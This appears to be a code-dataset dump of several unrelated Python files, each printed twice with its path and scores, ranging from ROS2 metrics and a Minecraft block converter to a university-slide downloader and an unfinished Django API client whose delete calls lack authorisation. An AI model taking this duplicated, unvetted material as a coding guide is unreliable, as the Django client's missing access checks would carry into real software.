# to not put a lock in hot path, observed messages is not thread safe on increment
self.observed_messages += 1 | ros2relay/metrics/metrics.py | import threading
class MessageMetrics:
def __init__(self):
""" """
self.byte_sum = 0
self.message_count = 0
self.message_handle_time = 0
def increment_message_count(self, message_size, time_taken):
self.message_count += 1
self.byte_sum += message_size
self.message_handle_time += time_taken
def get_and_reset_metrics(self):
m_count = self.message_count
b_sum = self.byte_sum
t_taken = self.message_handle_time
self.message_count = 0
self.byte_sum = 0
self.message_handle_time = 0
return (m_count, b_sum, t_taken)
class MessageMetricsHandler:
def __init__(self, num_handlers, count_drops=False):
""" """
self.dropped_messages = 0
self.dropped_per_period = 0
self.dropped_lock = threading.Lock()
self.observed_messages = 0
self.observed_lock = threading.Lock()
self.metric_handlers = []
self.count_drops = count_drops
for i in range(num_handlers):
self.metric_handlers.append(MessageMetrics())
def handle_message(self, handler, message_size, time_taken):
if handler > len(self.metric_handlers) - 1 or handler < 0:
raise ValueError(f"Handler must be between 0 and {len(self.metric_handlers) - 1}")
self.metric_handlers[handler].increment_message_count(message_size, time_taken)
def publish_metrics(self):
""" """
# list of tuples (message_count, byte_sum, time_taken) for each worker
vals = [m.get_and_reset_metrics() for m in self.metric_handlers]
# summed tuple, [sum(message_count), sum(byte_sum), sum(time_taken)]
sums = [sum(x) for x in zip(*vals)]
handle_time = 0 if sums[0] == 0 else sums[2]/sums[0]
if self.count_drops:
message = f"m/s observed: {self.observed_messages}. m/s:{sums[0]}. d:{self.dropped_messages} d/s:{self.dropped_per_period} KB/s:{(sums[1] / 1024):.2f}. t/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
with self.dropped_lock:
self.dropped_per_period = 0
else:
message = f"m/s observed: {self.observed_messages}. m/s sent:{sums[0]}. KB/s:{(sums[1] / 1024):.2f}. t/m/s:{handle_time:.2f}"
print(message.ljust(len(message)+20), end='')
print("\r", end='')
# only lock once per publish period to ensure we reset observed
with self.observed_lock:
self.observed_messages = 0
def increment_dropped(self):
# shouldn't be calling this if we haven't enabled drop counters
if self.count_drops:
with self.dropped_lock:
self.dropped_messages += 1
self.dropped_per_period += 1
def increment_observed(self):
# to not put a lock in hot path, observed messages is not thread safe on increment
self.observed_messages += 1 | 0.659953 | 0.198064 |
import os,json
from .block_functions import *
report_known_blocks = False
report_unknown_blocks = True
unknown_as_air = False
converted_blocks = {}
mods_available = {}
mods_priority = []
mods_enabled = {}
def str_mod(name):
author = mods_available[name]['author']
download = mods_available[name]['download']
description = mods_available[name]['description']
return f"[ {name} ] by {author}\n\t{description}\n\t{download}"
def load_mod(mod_file):
if mod_file[-5:] != '.json': return
mod = {
'name': 'unknown',
'author': 'anonymous',
'description': 'No description provided.',
'download': 'No download provided.',
'enabled': True,
'priority': 0,
'table': {},
}
with open(mod_file) as json_file:
try:
load = json.load(json_file)
except json.decoder.JSONDecodeError as e:
print("Error in mod:",mod_file)
print(e)
exit(1)
mod.update(load)
mods_available[mod['name']] = mod
mods_enabled[mod['name']] = mod['enabled']
mods_priority.append((mod['priority'],mod['name']))
mods_priority.sort()
def load_mods_from_path():
mod_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),"mods")
for mod_filename in os.listdir(mod_path):
load_mod(os.path.join(mod_path,mod_filename))
def find_in_table(table,key):
if key in table: return key
parts = key.split("_")
for i in range(1,len(parts)):
key_part = ("_".join(parts[:i]))+"?"
if key_part in table: return key_part
for i in range(1,len(parts)):
key_part = "?"+("_".join(parts[i:]))
if key_part in table: return key_part
def get_from_table(table,block):
key = find_in_table(table,block.id)
if not key: return
param0,param1,param2 = table[key]
try:
if type(param0)==str and param0[0]=="@":
param0 = (globals()[param0[1:]])(block)
if type(param1)==str and param1[0]=="@":
param1 = (globals()[param1[1:]])(block)
if type(param2)==str and param2[0]=="@":
param2 = (globals()[param2[1:]])(block)
except Exception as e:
print_block("ERROR",block)
raise e
return param0,param1,param2
def convert_block(block):
# Get conversion from cache
if block.id == "air": return ("air",15,0)
if str_block(block) in converted_blocks:
return converted_blocks[str_block(block)]
# Get conversion from mod
for priority,mod_name in mods_priority:
if not mods_enabled[mod_name]: continue
mod_table = mods_available[mod_name]['table']
converted = get_from_table(mod_table,block)
if converted:
converted_blocks[str_block(block)] = converted
if report_known_blocks: print_block("ConvertedBlock",block)
return converted
# Unknown block
if unknown_as_air: converted = ("air",15,0)
else: converted = (f"mc2mt:{block.id}",0,0)
converted_blocks[str_block(block)] = converted
if report_unknown_blocks: print_block("UnknownBlock",block)
return converted
def print_block(prefix,block):
print(prefix,str_block(block),sep="~")
def str_block(block):
string = str(block.id) + "~{"
if block.properties == {}:
return string + " }"
for p in sorted(block.properties.keys()):
string += "'" + str(p) + "':'" + str(block.properties[p]) + "', "
return string[:-2] + "}" | mc2mtlib/block_conversion.py | import os,json
from .block_functions import *
report_known_blocks = False
report_unknown_blocks = True
unknown_as_air = False
converted_blocks = {}
mods_available = {}
mods_priority = []
mods_enabled = {}
def str_mod(name):
author = mods_available[name]['author']
download = mods_available[name]['download']
description = mods_available[name]['description']
return f"[ {name} ] by {author}\n\t{description}\n\t{download}"
def load_mod(mod_file):
if mod_file[-5:] != '.json': return
mod = {
'name': 'unknown',
'author': 'anonymous',
'description': 'No description provided.',
'download': 'No download provided.',
'enabled': True,
'priority': 0,
'table': {},
}
with open(mod_file) as json_file:
try:
load = json.load(json_file)
except json.decoder.JSONDecodeError as e:
print("Error in mod:",mod_file)
print(e)
exit(1)
mod.update(load)
mods_available[mod['name']] = mod
mods_enabled[mod['name']] = mod['enabled']
mods_priority.append((mod['priority'],mod['name']))
mods_priority.sort()
def load_mods_from_path():
mod_path = os.path.join(os.path.dirname(os.path.abspath(__file__)),"mods")
for mod_filename in os.listdir(mod_path):
load_mod(os.path.join(mod_path,mod_filename))
def find_in_table(table,key):
if key in table: return key
parts = key.split("_")
for i in range(1,len(parts)):
key_part = ("_".join(parts[:i]))+"?"
if key_part in table: return key_part
for i in range(1,len(parts)):
key_part = "?"+("_".join(parts[i:]))
if key_part in table: return key_part
def get_from_table(table,block):
key = find_in_table(table,block.id)
if not key: return
param0,param1,param2 = table[key]
try:
if type(param0)==str and param0[0]=="@":
param0 = (globals()[param0[1:]])(block)
if type(param1)==str and param1[0]=="@":
param1 = (globals()[param1[1:]])(block)
if type(param2)==str and param2[0]=="@":
param2 = (globals()[param2[1:]])(block)
except Exception as e:
print_block("ERROR",block)
raise e
return param0,param1,param2
def convert_block(block):
# Get conversion from cache
if block.id == "air": return ("air",15,0)
if str_block(block) in converted_blocks:
return converted_blocks[str_block(block)]
# Get conversion from mod
for priority,mod_name in mods_priority:
if not mods_enabled[mod_name]: continue
mod_table = mods_available[mod_name]['table']
converted = get_from_table(mod_table,block)
if converted:
converted_blocks[str_block(block)] = converted
if report_known_blocks: print_block("ConvertedBlock",block)
return converted
# Unknown block
if unknown_as_air: converted = ("air",15,0)
else: converted = (f"mc2mt:{block.id}",0,0)
converted_blocks[str_block(block)] = converted
if report_unknown_blocks: print_block("UnknownBlock",block)
return converted
def print_block(prefix,block):
print(prefix,str_block(block),sep="~")
def str_block(block):
string = str(block.id) + "~{"
if block.properties == {}:
return string + " }"
for p in sorted(block.properties.keys()):
string += "'" + str(p) + "':'" + str(block.properties[p]) + "', "
return string[:-2] + "}" | 0.158077 | 0.111773 |
import requests
from django.shortcuts import render
# ****************************** GET ********************************
# get the list of all events of a client
def getEvents(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<clientId>/
response = requests.get(url+clientId)
events = response.json()
# extract the events of the list object called "events" in the JSON file
events_list = {'events': events['events']}
return events_list
# get the client profile
def getProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/profile
response = requests.get(url+clientId+'/profile')
userProfile = response.json()
return userProfile
# get the investment profile
def getInvestmentProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/investmentProfile
response = requests.get(url+clientId+'/investmentProfile')
invProfile = response.json()
return invProfile
# get an event
def getEvent(request, eventId):
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+eventId)
evt = response.json()
return evt
# get the list of all notes of a client
def getNotes(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<clientId>/
response = requests.get(url+clientId)
ns = response.json()
# extract the notes of the list object called "notes" in the JSON file
notes_list = {'notes': ns['notes']}
return notes_list
# get the list of all notes of an event
def getNotesByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<eventId>/
response = requests.get(url+eventId)
ns = response.json()
notes_list = {'notes': ns['notes']}
return notes_list
# get a note
def getNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+noteId)
nt = response.json()
return nt
# get the list of all documents of a client
def getDocuments(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<clientId>/
response = requests.get(url+clientId)
docs = response.json()
# extract the documents of the list object called "documents" in the JSON file
docs_list = {'docs': docs['docs']}
return docs_list
# get the list of all documents of an event
def getDocumentsByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<eventId>/
response = requests.get(url+eventId)
docs = response.json()
docs_list = {'docs': docs['docs']}
return docs_list
# get a document
def getDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<documentId>/
response = requests.get(url+documentId)
doc = response.json()
return doc
# ****************************** POST ********************************
def postNote(request, json):
url = 'https://hzmEndpoint.ch/notes/'
# json would be filled by form data
"""
json = {'clientId': "123",
"consultationId": "123-3456-3454-1",
"title": "Neue Notiz",
"evtCreated": "2021-01-17 10:00",
"evtModified": "2021-01-21 10:00",
"evtDue": "2021-05-17",
"reminder": True,
"textHtml": "Dies ist eine neue Notiz" } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, note stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def postDocument(request, json):
url = 'https://hzmEndpoint.ch/documents/'
# json would filled by form data / upload
"""
json = {"clientId": 012342223,
"consultationId": "123-3456-3454-1",
"title": "Risikoaufklärung 2.0",
"evtCreated": "2021-01-17 10:00",
"format": "pdf",
"status": "Neu",
"pdfResource":PDF resource } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, document stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
# ****************************** DELETE ********************************
def deleteNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/' + noteId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def deleteDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/' + documentId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text)) | app/services.py | import requests
from django.shortcuts import render
# ****************************** GET ********************************
# get the list of all events of a client
def getEvents(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<clientId>/
response = requests.get(url+clientId)
events = response.json()
# extract the events of the list object called "events" in the JSON file
events_list = {'events': events['events']}
return events_list
# get the client profile
def getProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/profile
response = requests.get(url+clientId+'/profile')
userProfile = response.json()
return userProfile
# get the investment profile
def getInvestmentProfile(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/clients/'
# https://hzmplaceholder.ch/clients/<clientId>/investmentProfile
response = requests.get(url+clientId+'/investmentProfile')
invProfile = response.json()
return invProfile
# get an event
def getEvent(request, eventId):
url = 'https://hzmEndpoint.ch/events/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+eventId)
evt = response.json()
return evt
# get the list of all notes of a client
def getNotes(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<clientId>/
response = requests.get(url+clientId)
ns = response.json()
# extract the notes of the list object called "notes" in the JSON file
notes_list = {'notes': ns['notes']}
return notes_list
# get the list of all notes of an event
def getNotesByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/notes/<eventId>/
response = requests.get(url+eventId)
ns = response.json()
notes_list = {'notes': ns['notes']}
return notes_list
# get a note
def getNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/'
# https://hzmplaceholder.ch/events/<eventId>/
response = requests.get(url+noteId)
nt = response.json()
return nt
# get the list of all documents of a client
def getDocuments(request):
clientId = request.user
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<clientId>/
response = requests.get(url+clientId)
docs = response.json()
# extract the documents of the list object called "documents" in the JSON file
docs_list = {'docs': docs['docs']}
return docs_list
# get the list of all documents of an event
def getDocumentsByEvent(request, eventId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<eventId>/
response = requests.get(url+eventId)
docs = response.json()
docs_list = {'docs': docs['docs']}
return docs_list
# get a document
def getDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/'
# https://hzmplaceholder.ch/documents/<documentId>/
response = requests.get(url+documentId)
doc = response.json()
return doc
# ****************************** POST ********************************
def postNote(request, json):
url = 'https://hzmEndpoint.ch/notes/'
# json would be filled by form data
"""
json = {'clientId': "123",
"consultationId": "123-3456-3454-1",
"title": "Neue Notiz",
"evtCreated": "2021-01-17 10:00",
"evtModified": "2021-01-21 10:00",
"evtDue": "2021-05-17",
"reminder": True,
"textHtml": "Dies ist eine neue Notiz" } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, note stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def postDocument(request, json):
url = 'https://hzmEndpoint.ch/documents/'
# json would filled by form data / upload
"""
json = {"clientId": 012342223,
"consultationId": "123-3456-3454-1",
"title": "Risikoaufklärung 2.0",
"evtCreated": "2021-01-17 10:00",
"format": "pdf",
"status": "Neu",
"pdfResource":PDF resource } """
response = requests.post(url, data=json)
if response.status_code == 200:
return print('POST successful, document stored', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
# ****************************** DELETE ********************************
def deleteNote(request, noteId):
url = 'https://hzmEndpoint.ch/notes/' + noteId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text))
def deleteDocument(request, documentId):
url = 'https://hzmEndpoint.ch/documents/' + documentId
# delete should have some tokens to validate permission / security reasons
# to be included here once known!
response = requests.delete(url)
if response.status_code == 200:
return print('DELETE successful', response.text)
else:
return print('something went wrong, check out the response code: %s and text %s'
% (response.status_code, response.text)) | 0.393735 | 0.133021 |
from datetime import datetime
from io import BytesIO
import json
import os
from unittest import TestCase
from unittest.mock import ANY, patch
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
from .. import index
class MockContext():
def get_remaining_time_in_millis(self):
return 30000
class TestIndex(TestCase):
def setUp(self):
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
self.s3_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
self.s3_client_patcher = patch(__name__ + '.index.make_s3_client', return_value=self.s3_client)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
self.env_patcher = patch.dict(os.environ, {
'ES_HOST': 'example.com',
'AWS_ACCESS_KEY_ID': 'test_key',
'AWS_SECRET_ACCESS_KEY': 'test_secret',
'AWS_DEFAULT_REGION': 'ng-north-1',
})
self.env_patcher.start()
def tearDown(self):
self.env_patcher.stop()
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
def test_test_event(self):
"""
Check that the indexer doesn't do anything when it gets S3 test notification.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Event": "s3:TestEvent"
})
})
}]
}
index.handler(event, None)
def test_index(self):
"""
Index a single text file.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Records": [{
"eventName": "s3:ObjectCreated:Put",
"s3": {
"bucket": {
"name": "test-bucket"
},
"object": {
"key": "hello+world.txt",
"eTag": "123456"
}
}
}]
})
})
}]
}
now = datetime.now()
metadata = {
'helium': json.dumps({
'comment': 'blah',
'user_meta': {
'foo': 'bar'
},
'x': 'y'
})
}
self.s3_stubber.add_response(
method='head_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
}
)
self.s3_stubber.add_response(
method='get_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
'Body': BytesIO(b'Hello World!'),
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
'Range': 'bytes=0-2000',
}
)
def es_callback(request):
actions = [json.loads(line) for line in request.body.splitlines()]
assert actions == [{
'index': {
'_index': 'test-bucket',
'_type': '_doc',
'_id': 'hello world.txt:None'
},
}, {
'comment': 'blah',
'content': 'Hello World!',
'etag': '123456',
'event': 's3:ObjectCreated:Put',
'ext': '.txt',
'key': 'hello world.txt',
'last_modified': now.isoformat(),
'meta_text': 'blah {"x": "y"} {"foo": "bar"}',
'size': 100,
'system_meta': {'x': 'y'},
'target': '',
'updated': ANY,
'user_meta': {'foo': 'bar'},
'version_id': None
}]
response = {
'items': [{
'index': {
'status': 200
}
}]
}
return (200, {}, json.dumps(response))
self.requests_mock.add_callback(
responses.POST,
'https://example.com:443/_bulk',
callback=es_callback,
content_type='application/json'
)
index.handler(event, MockContext()) | lambdas/es/indexer/test/test_index.py | from datetime import datetime
from io import BytesIO
import json
import os
from unittest import TestCase
from unittest.mock import ANY, patch
import boto3
from botocore import UNSIGNED
from botocore.client import Config
from botocore.stub import Stubber
import responses
from .. import index
class MockContext():
def get_remaining_time_in_millis(self):
return 30000
class TestIndex(TestCase):
def setUp(self):
self.requests_mock = responses.RequestsMock(assert_all_requests_are_fired=False)
self.requests_mock.start()
# Create a dummy S3 client that (hopefully) can't do anything.
self.s3_client = boto3.client('s3', config=Config(signature_version=UNSIGNED))
self.s3_client_patcher = patch(__name__ + '.index.make_s3_client', return_value=self.s3_client)
self.s3_client_patcher.start()
self.s3_stubber = Stubber(self.s3_client)
self.s3_stubber.activate()
self.env_patcher = patch.dict(os.environ, {
'ES_HOST': 'example.com',
'AWS_ACCESS_KEY_ID': 'test_key',
'AWS_SECRET_ACCESS_KEY': 'test_secret',
'AWS_DEFAULT_REGION': 'ng-north-1',
})
self.env_patcher.start()
def tearDown(self):
self.env_patcher.stop()
self.s3_stubber.assert_no_pending_responses()
self.s3_stubber.deactivate()
self.s3_client_patcher.stop()
self.requests_mock.stop()
def test_test_event(self):
"""
Check that the indexer doesn't do anything when it gets S3 test notification.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Event": "s3:TestEvent"
})
})
}]
}
index.handler(event, None)
def test_index(self):
"""
Index a single text file.
"""
event = {
"Records": [{
"body": json.dumps({
"Message": json.dumps({
"Records": [{
"eventName": "s3:ObjectCreated:Put",
"s3": {
"bucket": {
"name": "test-bucket"
},
"object": {
"key": "hello+world.txt",
"eTag": "123456"
}
}
}]
})
})
}]
}
now = datetime.now()
metadata = {
'helium': json.dumps({
'comment': 'blah',
'user_meta': {
'foo': 'bar'
},
'x': 'y'
})
}
self.s3_stubber.add_response(
method='head_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
}
)
self.s3_stubber.add_response(
method='get_object',
service_response={
'Metadata': metadata,
'ContentLength': 100,
'LastModified': now,
'Body': BytesIO(b'Hello World!'),
},
expected_params={
'Bucket': 'test-bucket',
'Key': 'hello world.txt',
'IfMatch': '123456',
'Range': 'bytes=0-2000',
}
)
def es_callback(request):
actions = [json.loads(line) for line in request.body.splitlines()]
assert actions == [{
'index': {
'_index': 'test-bucket',
'_type': '_doc',
'_id': 'hello world.txt:None'
},
}, {
'comment': 'blah',
'content': 'Hello World!',
'etag': '123456',
'event': 's3:ObjectCreated:Put',
'ext': '.txt',
'key': 'hello world.txt',
'last_modified': now.isoformat(),
'meta_text': 'blah {"x": "y"} {"foo": "bar"}',
'size': 100,
'system_meta': {'x': 'y'},
'target': '',
'updated': ANY,
'user_meta': {'foo': 'bar'},
'version_id': None
}]
response = {
'items': [{
'index': {
'status': 200
}
}]
}
return (200, {}, json.dumps(response))
self.requests_mock.add_callback(
responses.POST,
'https://example.com:443/_bulk',
callback=es_callback,
content_type='application/json'
)
index.handler(event, MockContext()) | 0.61659 | 0.260895 |
from enum import Enum
import random
from tokenize import String
import strings as Strings
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import config as Config
import strings as Strings
from youtube_search import YoutubeSearch
import json
import discord
def playType(message):
url = message.replace(Strings.BOT_PREFIX +
Strings.BOT_PLAY, Strings.EMPTY_STRING).strip()
if Strings.YOUTUBE_URL in url:
return url
elif Strings.SPOTIFY_URL in url:
spotifyUrl = getSongName(url)
spotifyUrl = Strings.YOUTUBE_URL + spotifyUrl
return spotifyUrl
else:
return Strings.MESSAGE_UNKNOWN
def getSongName(song):
sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(
client_id=Config.SPOTIFY_DEV_ID, client_secret=Config.SPOTIFY_DEV_SECRET))
results = sp.track(song)
songName = results[Strings.SPOTIFY_NAME]
uri = results[Strings.SPOTIFY_URI]
songArtist = sp.track(uri)
artist = songArtist[Strings.SPOTIFY_ARTIST]
jsonPart = json.dumps(artist)
findArtist = sp.artist(jsonPart[32:86])
youtubeArtist = findArtist[Strings.SPOTIFY_NAME]
youtubeSearch = YoutubeSearch(
f'{songName} {youtubeArtist}', max_results=1).to_json()
youtubeResult = youtubeSearch.split(':')
youtubeLinkLast = youtubeResult[len(
youtubeResult)-1].replace('"}]}', '')
youtubeLink = youtubeLinkLast.replace('"/', '')
youtubeURL = youtubeLink.strip()
return youtubeURL
async def checkConnectedChannel(ctx):
vc = ctx.voice_client
if not vc or not vc.is_connected():
return await ctx.send(Strings.MESSAGE_NOT_CONNECTED, delete_after=20)
async def sendSuffeledTeamEmbedMessage(ctx, members):
if len(members) == 10:
random.shuffle(members)
embed = discord.Embed(title=Strings.EMBED_TITLE,
description=Strings.EMBED_DESC, color=0x80ffff)
embed.add_field(name=Strings.EMBED_FIELD_1,
value=f"{members[0:5]}", inline=False)
embed.add_field(name=Strings.EMBED_FIELD_2,
value=f"{members[5:10]}", inline=False)
await ctx.send(embed=embed)
else:
await ctx.send(f'**{Strings.MESSAGE_WARNING}** \n `{Strings.MESSAGE_NOT_ENOUGH_PLAYER}`') | BotUtils.py | from enum import Enum
import random
from tokenize import String
import strings as Strings
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import config as Config
import strings as Strings
from youtube_search import YoutubeSearch
import json
import discord
def playType(message):
url = message.replace(Strings.BOT_PREFIX +
Strings.BOT_PLAY, Strings.EMPTY_STRING).strip()
if Strings.YOUTUBE_URL in url:
return url
elif Strings.SPOTIFY_URL in url:
spotifyUrl = getSongName(url)
spotifyUrl = Strings.YOUTUBE_URL + spotifyUrl
return spotifyUrl
else:
return Strings.MESSAGE_UNKNOWN
def getSongName(song):
sp = spotipy.Spotify(auth_manager=SpotifyClientCredentials(
client_id=Config.SPOTIFY_DEV_ID, client_secret=Config.SPOTIFY_DEV_SECRET))
results = sp.track(song)
songName = results[Strings.SPOTIFY_NAME]
uri = results[Strings.SPOTIFY_URI]
songArtist = sp.track(uri)
artist = songArtist[Strings.SPOTIFY_ARTIST]
jsonPart = json.dumps(artist)
findArtist = sp.artist(jsonPart[32:86])
youtubeArtist = findArtist[Strings.SPOTIFY_NAME]
youtubeSearch = YoutubeSearch(
f'{songName} {youtubeArtist}', max_results=1).to_json()
youtubeResult = youtubeSearch.split(':')
youtubeLinkLast = youtubeResult[len(
youtubeResult)-1].replace('"}]}', '')
youtubeLink = youtubeLinkLast.replace('"/', '')
youtubeURL = youtubeLink.strip()
return youtubeURL
async def checkConnectedChannel(ctx):
vc = ctx.voice_client
if not vc or not vc.is_connected():
return await ctx.send(Strings.MESSAGE_NOT_CONNECTED, delete_after=20)
async def sendSuffeledTeamEmbedMessage(ctx, members):
if len(members) == 10:
random.shuffle(members)
embed = discord.Embed(title=Strings.EMBED_TITLE,
description=Strings.EMBED_DESC, color=0x80ffff)
embed.add_field(name=Strings.EMBED_FIELD_1,
value=f"{members[0:5]}", inline=False)
embed.add_field(name=Strings.EMBED_FIELD_2,
value=f"{members[5:10]}", inline=False)
await ctx.send(embed=embed)
else:
await ctx.send(f'**{Strings.MESSAGE_WARNING}** \n `{Strings.MESSAGE_NOT_ENOUGH_PLAYER}`') | 0.34798 | 0.064772 |
import re
import time
import json
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import img2pdf
class Bookq():
URL = 'https://bookq.s.kyushu-u.ac.jp'
def __init__(self):
self._session = None
def login(self, secrets_file :str='secrets.json'):
"""Log in to BookQ.
Args:
secrets_file (str): Path to the json file containing your ID and password.
"""
with open(secrets_file, 'r') as f:
secrets = json.load(f)
self._session = requests.session()
login = self._session.get(f'{Bookq.URL}/login')
soup = BeautifulSoup(login.text, 'html.parser')
csrf = soup.select_one('input[name=_csrf]').get('value')
login = self._session.post(f'{Bookq.URL}/login', data={'userid': secrets['id'], 'password': secrets['<PASSWORD>'],'_csrf': csrf})
def _fetch_imgs(self, book_id :str, page_num :int, sleep_seconds :float) -> list[bin]:
"""Fetch slides from BookQ as image.
Args:
book_id (str): ID assigned to the book(slides).
page_num (int): Number of slides.
sleep_seconds (float): Time interval to fetch each slide.
Returns:
list[bin]: List of binary data of images.
"""
imgs = []
for page in tqdm(range(1, page_num+1)):
request = self._session.get(f'{Bookq.URL}/contents/unzipped/{book_id}_2/OPS/images/out_{page}.jpg', stream=True)
if request.status_code == 200:
imgs.append(request.content)
time.sleep(sleep_seconds)
else:
break
return imgs
def get_pdf(self, book_url :str, page_num :int, file_name :str='output.pdf', sleep_seconds :float=1):
"""Get slides from BookQ as pdf.
Args:
book_url (str): URL assigned to the book(slides).
page_num (int): Number of slides.
file_name (str): Name of output file.
sleep_seconds (float): Time interval to fetch each slide.
"""
book_id = re.findall(r'contents=.+', book_url)[0].replace('contents=', '')
imgs = self._fetch_imgs(book_id, page_num, sleep_seconds=sleep_seconds)
with open(file_name,'wb') as f:
f.write(img2pdf.convert(imgs))
print(f'\"{file_name}\" is generated.') | bookq2pdf.py | import re
import time
import json
from tqdm import tqdm
import requests
from bs4 import BeautifulSoup
import img2pdf
class Bookq():
URL = 'https://bookq.s.kyushu-u.ac.jp'
def __init__(self):
self._session = None
def login(self, secrets_file :str='secrets.json'):
"""Log in to BookQ.
Args:
secrets_file (str): Path to the json file containing your ID and password.
"""
with open(secrets_file, 'r') as f:
secrets = json.load(f)
self._session = requests.session()
login = self._session.get(f'{Bookq.URL}/login')
soup = BeautifulSoup(login.text, 'html.parser')
csrf = soup.select_one('input[name=_csrf]').get('value')
login = self._session.post(f'{Bookq.URL}/login', data={'userid': secrets['id'], 'password': secrets['<PASSWORD>'],'_csrf': csrf})
def _fetch_imgs(self, book_id :str, page_num :int, sleep_seconds :float) -> list[bin]:
"""Fetch slides from BookQ as image.
Args:
book_id (str): ID assigned to the book(slides).
page_num (int): Number of slides.
sleep_seconds (float): Time interval to fetch each slide.
Returns:
list[bin]: List of binary data of images.
"""
imgs = []
for page in tqdm(range(1, page_num+1)):
request = self._session.get(f'{Bookq.URL}/contents/unzipped/{book_id}_2/OPS/images/out_{page}.jpg', stream=True)
if request.status_code == 200:
imgs.append(request.content)
time.sleep(sleep_seconds)
else:
break
return imgs
def get_pdf(self, book_url :str, page_num :int, file_name :str='output.pdf', sleep_seconds :float=1):
"""Get slides from BookQ as pdf.
Args:
book_url (str): URL assigned to the book(slides).
page_num (int): Number of slides.
file_name (str): Name of output file.
sleep_seconds (float): Time interval to fetch each slide.
"""
book_id = re.findall(r'contents=.+', book_url)[0].replace('contents=', '')
imgs = self._fetch_imgs(book_id, page_num, sleep_seconds=sleep_seconds)
with open(file_name,'wb') as f:
f.write(img2pdf.convert(imgs))
print(f'\"{file_name}\" is generated.') | 0.592313 | 0.12943 |
OctetString, Integer, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "OctetString", "Integer", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ConstraintsUnion, ValueSizeConstraint, ValueRangeConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ConstraintsUnion", "ValueSizeConstraint", "ValueRangeConstraint")
gnomeProducts, = mibBuilder.importSymbols("GNOME-SMI", "gnomeProducts")
